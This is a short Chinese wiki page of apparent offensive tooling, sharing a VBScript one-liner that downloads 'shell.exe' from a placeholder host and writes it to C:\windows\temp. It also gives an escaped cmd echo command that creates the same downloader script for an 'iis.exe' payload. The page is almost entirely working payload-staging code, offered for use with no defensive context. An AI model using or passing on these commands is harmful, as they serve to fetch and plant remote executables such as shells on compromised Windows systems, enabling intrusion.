用户工具

站点工具


工具分享:vbs下载文件

cscript x.vbs

Set xPost = CreateObject("Microsoft.XMLHTTP"):xPost.Open "GET","http://xxxxx/shell.exe",0:xPost.Send():Set sGet = CreateObject("ADODB.Stream"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile "C:\windows\temp\shell.exe",2 

或者用cmd命令创建本vbs:

已转义

echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"http://xxxxx/iis.exe^",0:xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"C:\windows\temp\iis.exe^",2 >c:\windows\temp\cmd.vbs
你需要登录发表评论。
工具分享/vbs下载文件.txt · 最后更改: 2020/05/16 19:19 (外部编辑)

页面工具